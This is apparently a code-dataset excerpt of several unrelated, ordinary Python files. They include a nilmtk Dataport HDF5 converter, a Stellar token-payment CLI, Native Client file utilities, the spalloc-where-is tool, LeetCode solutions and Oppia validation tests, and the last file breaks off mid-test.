(\"2013-04-01\", None) or (\"2013-04-01\", \"2013-08-01\")\n defaults to all buildings and all date ranges\n \"\"\"\n\n database_assert(user_selected_table)\n # dataport database settings\n database_host = 'dataport.pecanstreet.org'\n database_port = '5434'\n database_name = 'postgres'\n\n # try to connect to database\n try:\n conn = db.connect('host=' + database_host +\n ' port=' + database_port +\n ' dbname=' + database_name +\n ' user=' + database_username +\n ' password=' + database_password)\n except:\n print('Could not connect to remote database')\n raise\n\n # map user_selected_table and timestamp column\n timestamp_map = {\"electricity_egauge_15min\": \"local_15min\",\n \"electricity_egauge_hours\": \"localhour\",\n \"electricity_egauge_minutes\": \"localminute\",\n \"electricity_egauge_seconds\": \"localminute\"}\n\n # set up a new HDF5 datastore (overwrites existing store)\n store = pd.HDFStore(hdf_filename, 'w', complevel=9, complib='zlib')\n\n # Create a temporary metadata dir, remove existing building\n # yaml files in module dir (if any)\n original_metadata_dir = join(get_module_directory(),\n 'dataset_converters',\n 'dataport',\n 'metadata')\n tmp_dir = tempfile.mkdtemp()\n metadata_dir = join(tmp_dir, 'metadata')\n shutil.copytree(original_metadata_dir, metadata_dir)\n print(\"Using temporary dir for metadata:\", metadata_dir)\n\n for f in os.listdir(metadata_dir):\n if re.search('^building', f):\n os.remove(join(metadata_dir, f))\n\n \"\"\"\n TODO:\n The section below can be altered or removed,\n since the restructured Dataport\n now has only one electricity_egauge_minutes table.\n \"\"\"\n # get tables in database schema\n sql_query = (\"SELECT table_name\" +\n \" FROM information_schema.views\" +\n \" WHERE table_schema ='\" + database_schema + \"'\" +\n \" ORDER BY table_name\")\n database_tables = pd.read_sql(sql_query, conn)['table_name'].tolist()\n database_tables = [t for t in database_tables if user_selected_table in t]\n # if user has specified buildings\n if periods_to_load:\n buildings_to_load = list(periods_to_load.keys())\n else:\n # get buildings present in all tables\n sql_query = ''\n for table in database_tables:\n sql_query = (sql_query + '(SELECT DISTINCT dataid' +\n ' FROM \"' + database_schema + '\".' 
+ table +\n ') UNION ')\n sql_query = sql_query[:-7]\n sql_query = (sql_query + ' ORDER BY dataid')\n buildings_to_load = pd.read_sql(sql_query, conn)['dataid'].tolist()\n\n # for each user specified building or all buildings in database\n for building_id in buildings_to_load:\n print(\"Loading building {:d} @ {}\"\n .format(building_id, datetime.datetime.now()))\n sys.stdout.flush()\n\n # create new list of chunks for concatenating later\n dataframe_list = []\n\n # for each table of 1 month data\n for database_table in database_tables:\n print(\" Loading table {:s}\".format(database_table))\n sys.stdout.flush()\n\n # get buildings present in electricity_egauge_minutes table\n sql_query = ('SELECT DISTINCT dataid' +\n ' FROM university.metadata' +\n ' WHERE egauge_min_time IS NOT NULL' +\n ' ORDER BY dataid')\n\n buildings_in_table = pd.read_sql(sql_query,\n conn)['dataid'].tolist()\n if building_id in buildings_in_table:\n # get first and last timestamps for this\n # house in electricity_egauge_minutes table\n sql_query = ('SELECT MIN(egauge_min_time) AS minlocalminute,' +\n ' MAX(egauge_max_time) AS maxlocalminute' +\n ' FROM university.metadata' +\n ' WHERE dataid=' + str(building_id))\n\n range = pd.read_sql(sql_query, conn)\n\n first_timestamp_in_table = range['minlocalminute'][0]\n last_timestamp_in_table = range['maxlocalminute'][0]\n\n # get requested start and end and localize them\n requested_start = None\n requested_end = None\n database_timezone = 'US/Central'\n if periods_to_load:\n if periods_to_load[building_id][0]:\n requested_start = pd.Timestamp(periods_to_load[building_id][0])\n requested_start = requested_start.tz_localize(database_timezone)\n if periods_to_load[building_id][1]:\n requested_end = pd.Timestamp(periods_to_load[building_id][1])\n requested_end = requested_end.tz_localize(database_timezone)\n\n # check user start is not after end\n if requested_start > requested_end:\n print('requested end is before requested start')\n sys.stdout.flush()\n else:\n # clip data to smallest range\n if requested_start:\n start = max(requested_start, first_timestamp_in_table)\n else:\n start = first_timestamp_in_table\n if requested_end:\n end = min(requested_end, last_timestamp_in_table)\n else:\n end = last_timestamp_in_table\n\n # download data in chunks\n chunk_start = start\n chunk_size = datetime.timedelta(10) # 1 day\n while chunk_start < end:\n chunk_end = chunk_start + chunk_size\n if chunk_end > end:\n chunk_end = end\n # subtract 1 second so end is exclusive\n chunk_end = chunk_end - datetime.timedelta(0, 1)\n\n # query power data for all channels\n format = '%Y-%m-%d %H:%M:%S'\n sql_query = ('SELECT *' +\n ' FROM \"' + database_schema + '\".' 
+ user_selected_table +\n ' WHERE dataid=' + str(building_id) +\n 'and \"' + timestamp_map[user_selected_table] + '\" between ' +\n \"'\" + chunk_start.strftime(format) + \"'\" +\n \" and \" +\n \"'\" + chunk_end.strftime(format) +\n \"' ORDER BY \"+timestamp_map[user_selected_table]\n )\n chunk_dataframe = pd.read_sql(sql_query, conn)\n # nilmtk requires building indices to start at 1\n nilmtk_building_id = buildings_to_load.index(building_id) + 1\n # convert to nilmtk-df and save to disk\n nilmtk_dataframe = _dataport_dataframe_to_hdf(\n chunk_dataframe, store,\n nilmtk_building_id,\n building_id,\n timestamp_map[user_selected_table],\n metadata_dir\n )\n\n # print progress\n print(' ' + str(chunk_start) + ' -> ' +\n str(chunk_end) + ': ' +\n str(len(chunk_dataframe.index)) + ' rows')\n sys.stdout.flush()\n\n # append all chunks into list for csv writing\n # dataframe_list.append(chunk_dataframe)\n\n # move on to next chunk\n chunk_start = chunk_start + chunk_size\n\n # saves all chunks in list to csv\n # if len(dataframe_list) > 0:\n # dataframe_concat = pd.concat(dataframe_list)\n # dataframe_concat.to_csv(output_directory + str(building_id) + '.csv')\n\n store.close()\n conn.close()\n\n # write yaml to hdf5\n # dataset.yaml and meter_devices.yaml are static, building<x>.yaml are dynamic\n convert_yaml_to_hdf5(metadata_dir, hdf_filename)\n\n # remote the temporary dir when finished\n shutil.rmtree(tmp_dir)\n\n\ndef _dataport_dataframe_to_hdf(dataport_dataframe,\n store,\n nilmtk_building_id,\n dataport_building_id,\n timestamp_name,\n metadata_dir):\n local_dataframe = dataport_dataframe.copy()\n\n # remove timezone information to avoid append errors\n local_dataframe[timestamp_name] = pd.DatetimeIndex([i.replace(tzinfo=None)\n for i in local_dataframe[timestamp_name]])\n # set timestamp as frame index\n local_dataframe = local_dataframe.set_index(timestamp_name)\n\n # set timezone\n local_dataframe = local_dataframe.tz_localize('US/Central')\n # remove timestamp column from dataframe\n feeds_dataframe = local_dataframe.drop('dataid', axis=1)\n # Column names for dataframe\n column_names = [('power', 'active')]\n # convert from kW to W\n feeds_dataframe = feeds_dataframe.mul(1000)\n # building metadata\n building_metadata = {}\n building_metadata['instance'] = nilmtk_building_id\n building_metadata['original_name'] = int(dataport_building_id) # use python int\n building_metadata['elec_meters'] = {}\n building_metadata['appliances'] = []\n\n # initialise dict of instances of each appliance type\n instance_counter = {}\n\n meter_id = 1\n for column in feeds_dataframe.columns:\n if feeds_dataframe[column].notnull().sum() > 0 and not column in feed_ignore:\n\n # convert timeseries into dataframe\n feed_dataframe = pd.DataFrame(feeds_dataframe[column])\n\n # set column names\n feed_dataframe.columns = pd.MultiIndex.from_tuples(column_names)\n\n # Modify the column labels to reflect the power measurements recorded.\n feed_dataframe.columns.set_names(LEVEL_NAMES, inplace=True)\n\n key = Key(building=nilmtk_building_id, meter=meter_id)\n\n # store dataframe\n store.put(str(key), feed_dataframe, format='table', append=True)\n store.flush()\n\n # elec_meter metadata\n if column == 'use':\n meter_metadata = {'device_model': 'eGauge',\n 'site_meter': True}\n else:\n meter_metadata = {'device_model': 'eGauge',\n 'submeter_of': 0}\n building_metadata['elec_meters'][meter_id] = meter_metadata\n # appliance metadata\n if column != 'use':\n # original name and meter id\n appliance_metadata = 
{'original_name': column,\n 'meters': [meter_id]}\n # appliance type and room if available\n appliance_metadata.update(feed_mapping[column])\n # appliance instance number\n if instance_counter.get(appliance_metadata['type']) == None:\n instance_counter[appliance_metadata['type']] = 0\n instance_counter[appliance_metadata['type']] += 1\n appliance_metadata['instance'] = instance_counter[appliance_metadata['type']]\n building_metadata['appliances'].append(appliance_metadata)\n\n meter_id += 1\n\n # write building yaml to file\n building = 'building{:d}'.format(nilmtk_building_id)\n yaml_full_filename = join(metadata_dir, building + '.yaml')\n with open(yaml_full_filename, 'w') as outfile:\n outfile.write(yaml.dump(building_metadata))\n\n return 0\n"} {"ext": "py", "sha": "1a30c55d62d8a77272434ab0875bbada042fc988", "content": "from unittest import TestCase\n\nfrom nba_data.data.box_scores import GameBoxScore\n\n\nclass TestBoxScore(TestCase):\n def test_instantiation(self):\n test_box_score = GameBoxScore(game_id=\"bae\", player_box_scores=[], team_box_scores=[])\n self.assertIsNotNone(test_box_score)\n self.assertEqual(test_box_score.game_id, \"bae\")\n self.assertEqual(test_box_score.player_box_scores, [])\n self.assertEqual(test_box_score.team_box_scores, [])\n"} {"ext": "py", "sha": "1a30c560e3551736dc863a833eccb11ca158a08e", "content": "#!/usr/bin/env python\nimport urllib\nfrom decimal import Decimal\nfrom getpass import getpass\n\nimport click\nfrom stellar_base import exceptions\nfrom stellar_base.address import Address\nfrom stellar_base.builder import Builder\nfrom stellar_base.keypair import Keypair\n\nfrom config import configs\nfrom validate import validate\n\n\n@click.command()\n@click.argument('target_address')\n@click.argument('amount')\n@click.option('--network', default='TESTNET', type=click.Choice(['TESTNET', 'PUBLIC']))\n@click.option('--source_secret', prompt=True, hide_input=True)\ndef payment(target_address: str, amount: str, network, source_secret):\n config = configs[network]\n src_address = Keypair.from_seed(source_secret).address().decode()\n builder = Builder(secret=source_secret, horizon_uri=config['HORIZON_URL'], network=network)\n builder.append_payment_op(destination=target_address, asset_code='HOT',\n asset_issuer=config['ISSUER_HOT'], amount=amount)\n builder.sign()\n print(\"############### TX #################\")\n print('Payment {} HOT from {} to {}'.format(amount, src_address, target_address))\n print('Network: {}'.format(network))\n print('Sequence: {}'.format(builder.sequence))\n print('Hash: {}'.format(builder.hash()))\n print(\"#########################################\")\n click.confirm('Correct?', abort=True)\n print('Submitting...')\n builder.submit()\n print('success')\n return True\n\nif __name__ == '__main__':\n payment()\n"} {"ext": "py", "sha": "1a30c62d73df388e8abad757f3574701663a0b82", "content": "#!/usr/bin/python\n# Copyright (c) 2012 The Native Client Authors. 
All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n\"\"\"Convience file system related operations.\"\"\"\n\n\nimport os\nimport shutil\nimport sys\nimport tempfile\n\nimport platform\nimport time\n\n\ndef AtomicWriteFile(data, filename):\n \"\"\"Write a file atomically.\n\n NOTE: Not atomic on Windows!\n Args:\n data: String to write to the file.\n filename: Filename to write.\n \"\"\"\n filename = os.path.abspath(filename)\n handle, temp_file = tempfile.mkstemp(\n prefix='atomic_write', suffix='.tmp',\n dir=os.path.dirname(filename))\n fh = os.fdopen(handle, 'wb')\n fh.write(data)\n fh.close()\n # Window's can't move into place atomically, delete first.\n if sys.platform in ['win32', 'cygwin']:\n try:\n os.remove(filename)\n except OSError:\n pass\n os.rename(temp_file, filename)\n\n\ndef WriteFile(data, filename):\n \"\"\"Write a file in one step.\n\n Args:\n data: String to write to the file.\n filename: Filename to write.\n \"\"\"\n fh = open(filename, 'wb')\n fh.write(data)\n fh.close()\n\n\ndef ReadFile(filename):\n \"\"\"Read a file in one step.\n\n Args:\n filename: Filename to read.\n Returns:\n String containing complete file.\n \"\"\"\n fh = open(filename, 'rb')\n data = fh.read()\n fh.close()\n return data\n\n\nclass ExecutableNotFound(Exception):\n pass\n\n\ndef Which(command, paths=None, require_executable=True):\n \"\"\"Find the absolute path of a command in the current PATH.\n\n Args:\n command: Command name to look for.\n paths: Optional paths to search.\n Returns:\n Absolute path of the command (first one found),\n or default to a bare command if nothing is found.\n \"\"\"\n if paths is None:\n paths = os.environ.get('PATH', '').split(os.pathsep)\n exe_suffixes = ['']\n if sys.platform == 'win32':\n exe_suffixes += ['.exe']\n for p in paths:\n np = os.path.abspath(os.path.join(p, command))\n for suffix in exe_suffixes:\n full_path = np + suffix\n if (os.path.isfile(full_path) and\n (not require_executable or os.access(full_path, os.X_OK))):\n return full_path\n raise ExecutableNotFound('Unable to find: ' + command)\n\n\ndef MakeDirectoryIfAbsent(path):\n \"\"\"Create a directory if it doesn't already exist.\n\n Args:\n path: Directory to create.\n \"\"\"\n if not os.path.isdir(path):\n os.makedirs(path)\n\n\ndef MakeParentDirectoryIfAbsent(path):\n \"\"\"Creates a directory for the parent if it doesn't already exist.\n\n Args:\n path: Path of child where parent directory should be created for.\n \"\"\"\n MakeDirectoryIfAbsent(os.path.dirname(path))\n\n\ndef RemoveDirectoryIfPresent(path):\n \"\"\"Remove a directory if it exists.\n\n Args:\n path: Directory to remove.\n \"\"\"\n # On Windows, attempts to remove read-only files get Error 5. This\n # error handler fixes the permissions and retries the removal.\n def onerror_readonly(func, path, exc_info):\n import stat\n if not os.access(path, os.W_OK):\n os.chmod(path, stat.S_IWUSR)\n func(path)\n\n if os.path.exists(path):\n shutil.rmtree(path, onerror=onerror_readonly)\n\n\ndef CopyTree(src, dst):\n \"\"\"Recursively copy the items in the src directory to the dst directory.\n\n Unlike shutil.copytree, the destination directory and any subdirectories and\n files may exist. Existing directories are left untouched, and existing files\n are removed and copied from the source using shutil.copy2. It is also not\n symlink-aware.\n\n Args:\n src: Source. Must be an existing directory.\n dst: Destination directory. If it exists, must be a directory. 
Otherwise it\n will be created, along with parent directories.\n \"\"\"\n if not os.path.isdir(dst):\n os.makedirs(dst)\n for root, dirs, files in os.walk(src):\n relroot = os.path.relpath(root, src)\n dstroot = os.path.join(dst, relroot)\n for d in dirs:\n dstdir = os.path.join(dstroot, d)\n if not os.path.isdir(dstdir):\n os.mkdir(dstdir)\n for f in files:\n dstfile = os.path.join(dstroot, f)\n if os.path.isfile(dstfile):\n os.remove(dstfile)\n shutil.copy2(os.path.join(root, f), dstfile)\n\n\ndef MoveAndMergeDirTree(src_dir, dest_dir):\n \"\"\"Moves everything from a source directory to a destination directory.\n\n This is different from shutil's move implementation in that it only operates\n on directories, and if the destination directory exists, it will move the\n contents into the directory and merge any existing directories.\n\n Args:\n src_dir: Source directory which files should be moved from.\n dest_dir: Destination directory where files should be moved and merged to.\n \"\"\"\n if not os.path.isdir(src_dir):\n raise OSError('MoveAndMergeDirTree can only operate on directories.')\n\n if not os.path.exists(dest_dir):\n # Simply move the directory over if destination doesn't exist.\n MakeParentDirectoryIfAbsent(dest_dir)\n os.rename(src_dir, dest_dir)\n else:\n # Merge each item if destination directory exists.\n for dir_item in os.listdir(src_dir):\n source_item = os.path.join(src_dir, dir_item)\n destination_item = os.path.join(dest_dir, dir_item)\n if os.path.exists(destination_item):\n if os.path.isdir(destination_item) and os.path.isdir(source_item):\n # Merge the sub-directories together if they are both directories.\n MoveAndMergeDirTree(source_item, destination_item)\n elif os.path.isfile(destination_item) and os.path.isfile(source_item):\n # Overwrite the file if they are both files.\n os.unlink(destination_item)\n os.rename(source_item, destination_item)\n else:\n raise OSError('Cannot move directory tree, mismatching types.'\n ' Source - %s. Destination - %s' %\n (source_item, destination_item))\n else:\n os.rename(source_item, destination_item)\n\n # Remove the directory once all the contents have been moved\n os.rmdir(src_dir)\n\n\ndef Retry(op, *args):\n # Windows seems to be prone to having commands that delete files or\n # directories fail. We currently do not have a complete understanding why,\n # and as a workaround we simply retry the command a few times.\n # It appears that file locks are hanging around longer than they should. This\n # may be a secondary effect of processes hanging around longer than they\n # should. 
This may be because when we kill a browser sel_ldr does not exit\n # immediately, etc.\n # Virus checkers can also accidently prevent files from being deleted, but\n # that shouldn't be a problem on the bots.\n if platform.IsWindows():\n count = 0\n while True:\n try:\n op(*args)\n break\n except Exception:\n sys.stdout.write('FAILED: %s %s\\n' % (op.__name__, repr(args)))\n count += 1\n if count < 5:\n sys.stdout.write('RETRY: %s %s\\n' % (op.__name__, repr(args)))\n time.sleep(pow(2, count))\n else:\n # Don't mask the exception.\n raise\n else:\n op(*args)\n\n\ndef MoveDirCleanly(src, dst):\n RemoveDir(dst)\n MoveDir(src, dst)\n\n\ndef MoveDir(src, dst):\n Retry(shutil.move, src, dst)\n\n\ndef RemoveDir(path):\n if os.path.exists(path):\n Retry(shutil.rmtree, path)\n\n\ndef RemoveFile(path):\n if os.path.exists(path):\n Retry(os.unlink, path)\n"} {"ext": "py", "sha": "1a30c632e40550975854418757821a570b2a722c", "content": "__author__ = \"Thomas Spycher, Philipp Spinnler\"\n__copyright__ = \"Copyright 2013, Zerodine GmbH (zerodine.com) \"\n__credits__ = [\"Thomas Spycher\", \"Philipp Spinnler\"]\n__license__ = \"Apache-2.0\"\n__maintainer__ = \"Thomas Spycher\"\n__email__ = \"me@tspycher.com\"\n__status__ = \"Development\"\n\n\nfrom indexcontroller import IndexController\nfrom lookupcontroller import LookupController\nfrom addcontroller import AddController\nfrom reconcontroller import ReconController"} {"ext": "py", "sha": "1a30c6b22bfdf091c8fb98c1228153fa497b8362", "content": "class Solution:\n def myAtoi(self, string: str) -> int:\n\n string = string.strip()\n ans = 0\n sign = \"+\"\n index = 0\n\n if not string:\n return 0\n\n if string[0] != \"+\" and string[0] != \"-\" and string[0].isdigit() is False:\n return 0\n\n if string[0] == \"-\":\n sign = \"-\"\n index += 1\n elif string[0] == \"+\":\n index += 1\n\n while index < len(string):\n\n if string[index].isdigit() is False:\n ans = ans if sign == \"+\" else - ans\n\n if ans < -2 ** 31:\n return -2 ** 31\n elif ans > 2 ** 31 - 1:\n return 2 ** 31 - 1\n else:\n return ans\n\n ans = 10 * ans + int(string[index])\n index += 1\n\n ans = ans if sign == \"+\" else -ans\n\n if ans < -2 ** 31:\n return -2 ** 31\n elif ans > 2 ** 31 - 1:\n return 2 ** 31 - 1\n else:\n return ans\n"} {"ext": "py", "sha": "1a30c6bd92450c13df17b6d8d04efe99dd7ce850", "content": "\"\"\"Command-line tool to find out where a particular chip or board resides.\n\nThe ``spalloc-where-is`` command allows you to query boards by coordinate, by\nphysical location, by chip or by job. In response to a query, a standard set of\ninformation is displayed as shown in the example below::\n\n $ spalloc-where-is --job-chip 24 14, 3\n Machine: my-machine\n Physical Location: Cabinet 2, Frame 4, Board 7\n Board Coordinate: (3, 4, 0)\n Machine Chip Coordinates: (38, 51)\n Coordinates within board: (2, 3)\n Job using board: 24\n Coordinates within job: (14, 3)\n\nIn this example we ask, 'where is chip (14, 3) in job 24'? We discover that:\n\n* The chip is the machine named 'my-machine' on the board in cabinet 2, frame\n 4, board 7.\n* This board's logical board coordinates are (3, 4, 0). These logical\n coordinates may be used to specifically request this board from Spalloc in\n the future.\n* If 'my-machine' were booted as a single large machine, the chip we queried\n would be chip (38, 51). This may be useful for cross-referencing with\n diagrams produced by SpiNNer_.\n* The chip in question is chip (2, 3) its board. 
This may be useful when\n reporting faulty chips/replacing boards..\n* The job currently running on the board has ID 24. Obviously in this example\n we already knew this but this may be useful when querying by board.\n* Finally, we're told that the queried chip has the coordinates (14, 3) in the\n machine allocated to job 24. Again, this information may be more useful when\n querying by board.\n\n.. _SpiNNer: https://github.com/SpiNNakerManchester/SpiNNer\n\nTo query by logical board coordinate::\n\n spalloc-where-is --board MACHINE X Y Z\n\nTo query by physical board location::\n\n spalloc-where-is --physical MACHINE CABINET FRAME BOARD\n\nTo query by chip coordinate (as if the machine were booted as one large\nmachine)::\n\n spalloc-where-is --chip MACHINE X Y\n\nTo query by chip coordinate of chips allocated to a job::\n\n spalloc-where-is --job-chip JOB_ID X Y\n\"\"\"\nimport sys\nimport argparse\n\nfrom collections import OrderedDict\n\nfrom spalloc import config\nfrom spalloc import __version__, ProtocolClient, ProtocolTimeoutError\nfrom spalloc.term import render_definitions\n\n\n# The acceptable range of server version numbers\nVERSION_RANGE_START = (0, 3, 0)\nVERSION_RANGE_STOP = (2, 0, 0)\n\n\ndef main(argv=None):\n cfg = config.read_config()\n\n parser = argparse.ArgumentParser(\n description=\"Find out the location (physical or logical) \"\n \"of a chip or board.\")\n\n parser.add_argument(\"--version\", \"-V\", action=\"version\",\n version=__version__)\n\n control_args = parser.add_mutually_exclusive_group(required=True)\n control_args.add_argument(\"--board\", \"-b\", \"--logical\", \"-l\", nargs=4,\n metavar=(\"MACHINE\", \"X\", \"Y\", \"Z\"),\n help=\"specify the logical board coordinate\")\n control_args.add_argument(\"--physical\", \"-p\", nargs=4,\n metavar=(\"MACHINE\", \"CABINET\", \"FRAME\", \"BOARD\"),\n help=\"specify a board's physical location\")\n control_args.add_argument(\"--chip\", \"-c\", nargs=3,\n metavar=(\"MACHINE\", \"X\", \"Y\"),\n help=\"specify a board by chip coordinates (as \"\n \"if the whole machine is being used)\")\n control_args.add_argument(\"--job-chip\", \"-j\", nargs=3,\n metavar=(\"JOB_ID\", \"X\", \"Y\"),\n help=\"specify the chip coordinates of a chip \"\n \"within a job's boards\")\n\n server_args = parser.add_argument_group(\"spalloc server arguments\")\n\n server_args.add_argument(\"--hostname\", \"-H\", default=cfg[\"hostname\"],\n help=\"hostname or IP of the spalloc server \"\n \"(default: %(default)s)\")\n server_args.add_argument(\"--port\", \"-P\", default=cfg[\"port\"],\n type=int,\n help=\"port number of the spalloc server \"\n \"(default: %(default)s)\")\n server_args.add_argument(\"--timeout\", default=cfg[\"timeout\"],\n type=float, metavar=\"SECONDS\",\n help=\"seconds to wait for a response \"\n \"from the server (default: %(default)s)\")\n\n args = parser.parse_args(argv)\n\n # Fail if server not specified\n if args.hostname is None:\n parser.error(\"--hostname of spalloc server must be specified\")\n\n client = ProtocolClient(args.hostname, args.port)\n try:\n # Connect to server and ensure compatible version\n client.connect()\n version = tuple(\n map(int, client.version(timeout=args.timeout).split(\".\")))\n if not (VERSION_RANGE_START <= version < VERSION_RANGE_STOP):\n sys.stderr.write(\"Incompatible server version ({}).\\n\".format(\n \".\".join(map(str, version))))\n return 2\n\n # Work out what the user asked for\n try:\n show_board_chip = False\n if args.board:\n machine, x, y, z = args.board\n where_is_kwargs 
= {\n \"machine\": machine,\n \"x\": int(x),\n \"y\": int(y),\n \"z\": int(z),\n }\n elif args.physical:\n machine, c, f, b = args.physical\n where_is_kwargs = {\n \"machine\": machine,\n \"cabinet\": int(c),\n \"frame\": int(f),\n \"board\": int(b),\n }\n elif args.chip:\n machine, x, y = args.chip\n where_is_kwargs = {\n \"machine\": machine,\n \"chip_x\": int(x),\n \"chip_y\": int(y),\n }\n show_board_chip = True\n elif args.job_chip:\n job_id, x, y = args.job_chip\n where_is_kwargs = {\n \"job_id\": int(job_id),\n \"chip_x\": int(x),\n \"chip_y\": int(y),\n }\n show_board_chip = True\n except ValueError as e:\n parser.error(\"Error: {}\".format(e))\n\n # Ask the server\n location = client.where_is(**where_is_kwargs)\n if location is None:\n sys.stderr.write(\"No boards at the specified location.\\n\")\n return 4\n else:\n out = OrderedDict()\n out[\"Machine\"] = location[\"machine\"]\n out[\"Physical location\"] = \"Cabinet {}, Frame {}, Board {}\".format(\n *location[\"physical\"])\n out[\"Board coordinate\"] = tuple(location[\"logical\"])\n out[\"Machine chip coordinates\"] = tuple(location[\"chip\"])\n if show_board_chip:\n out[\"Coordinates within board\"] = tuple(location[\"board_chip\"])\n out[\"Job using board\"] = location[\"job_id\"]\n if location[\"job_id\"]:\n out[\"Coordinates within job\"] = tuple(location[\"job_chip\"])\n\n print(render_definitions(out))\n return 0\n\n except (IOError, OSError, ProtocolTimeoutError) as e:\n sys.stderr.write(\"Error communicating with server: {}\\n\".format(e))\n return 1\n finally:\n client.close()\n\n\nif __name__ == \"__main__\": # pragma: no cover\n sys.exit(main())\n"} {"ext": "py", "sha": "1a30c7911b5f3552849125ccf446ef0d8bd4b9b1", "content": "# [1081] 不同字符的最小子序列\n\n# https://leetcode-cn.com/problems/smallest-subsequence-of-distinct-characters/description/\n\n# * algorithms\n# * Medium (53.88%)\n# * Total Accepted: 6.7K\n# * Total Submissions: 12.5K\n# * Testcase Example: '\"bcabc\"'\n\n# 返回字符串 text 中按字典序排列最小的子序列,该子序列包含 text 中所有不同字符一次。\n\n#\n\n# 示例 1:\n\n# 输入:\"cdadabcc\"\n# 输出:\"adbc\"\n\n\n# 示例 2:\n\n# 输入:\"abcd\"\n# 输出:\"abcd\"\n\n\n# 示例 3:\n\n# 输入:\"ecbacba\"\n# 输出:\"eacb\"\n\n\n# 示例 4:\n\n# 输入:\"leetcode\"\n# 输出:\"letcod\"\n\n\n#\n\n# 提示:\n\n\n# \t1 <= text.length <= 1000\n# \ttext 由小写英文字母组成\n\n\n#\n\n# 注意:本题目与 316 https://leetcode-cn.com/problems/remove-duplicate-letters/ 相同\n\nimport collections\n\n\nclass Solution(object):\n def smallestSubsequence(self, text):\n seen = set()\n stack = []\n # 记录每个字母还可以删除几次,也可以保存每个字符最右边的位置用于判断\n remain_counter = collections.Counter(text)\n for c in text:\n # 每个字母只能出现一次,之前出现过的,现在没有出现过的意义,这是一个单调递增的栈\n if c not in seen:\n # 栈顶太大了,而且后面还有\n while stack and stack[-1] > c and remain_counter[stack[-1]] > 0:\n seen.discard(stack.pop())\n stack.append(c)\n seen.add(c)\n remain_counter[c] -= 1\n return \"\".join(stack)\n"} {"ext": "py", "sha": "1a30c85355b930c93afd047e14ad7652370579ee", "content": "# coding: utf-8\n#\n# Copyright 2021 The Oppia Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Unit tests for jobs.transforms.config_validation.\"\"\"\n\nfrom __future__ import absolute_import # pylint: disable=import-only-modules\nfrom __future__ import unicode_literals # pylint: disable=import-only-modules\n\nfrom core.domain import platform_parameter_domain as parameter_domain\nfrom core.platform import models\nfrom jobs import job_test_utils\nfrom jobs.transforms import config_validation\nfrom jobs.types import base_validation_errors\n\nimport apache_beam as beam\n\n(base_models, config_models) = models.Registry.import_models(\n [models.NAMES.base_model, models.NAMES.config])\n\n\nclass ValidateConfigPropertySnapshotMetadataModelTests(\n job_test_utils.PipelinedTestBase):\n\n def test_validate_change_domain_implemented(self):\n invalid_commit_cmd_model = (\n config_models.ConfigPropertySnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{\n 'cmd': base_models.VersionedModel.CMD_DELETE_COMMIT}])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation.ValidateConfigPropertySnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [])\n\n def test_config_property_change_object_with_missing_cmd(self):\n invalid_commit_cmd_model = (\n config_models.ConfigPropertySnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{'invalid': 'data'}])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation.ValidateConfigPropertySnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n {'invalid': 'data'},\n 'Missing cmd key in change dict')\n ])\n\n def test_config_property_change_object_with_invalid_cmd(self):\n invalid_commit_cmd_model = (\n config_models.ConfigPropertySnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{'cmd': 'invalid'}])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation.ValidateConfigPropertySnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n {'cmd': 'invalid'},\n 'Command invalid is not allowed')\n ])\n\n def test_config_property_change_object_with_missing_attribute_in_cmd(self):\n invalid_commit_cmd_model = (\n config_models.ConfigPropertySnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{'cmd': 'change_property_value'}])\n )\n\n output = (\n self.pipeline\n | 
beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation.ValidateConfigPropertySnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n {'cmd': 'change_property_value'},\n 'The following required attributes are missing: '\n 'new_value')\n ])\n\n def test_config_property_change_object_with_extra_attribute_in_cmd(self):\n commit_dict = {\n 'cmd': 'change_property_value',\n 'new_value': 'new_value',\n 'invalid': 'invalid'\n }\n invalid_commit_cmd_model = (\n config_models.ConfigPropertySnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[commit_dict])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation.ValidateConfigPropertySnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n commit_dict,\n 'The following extra attributes are present: invalid')\n ])\n\n\nclass ValidatePlatformParameterSnapshotMetadataModelTests(\n job_test_utils.PipelinedTestBase):\n\n CMD_EDIT_RULES = parameter_domain.PlatformParameterChange.CMD_EDIT_RULES\n\n def test_validate_change_domain_implemented(self):\n invalid_commit_cmd_model = (\n config_models.PlatformParameterSnapshotMetadataModel(\n 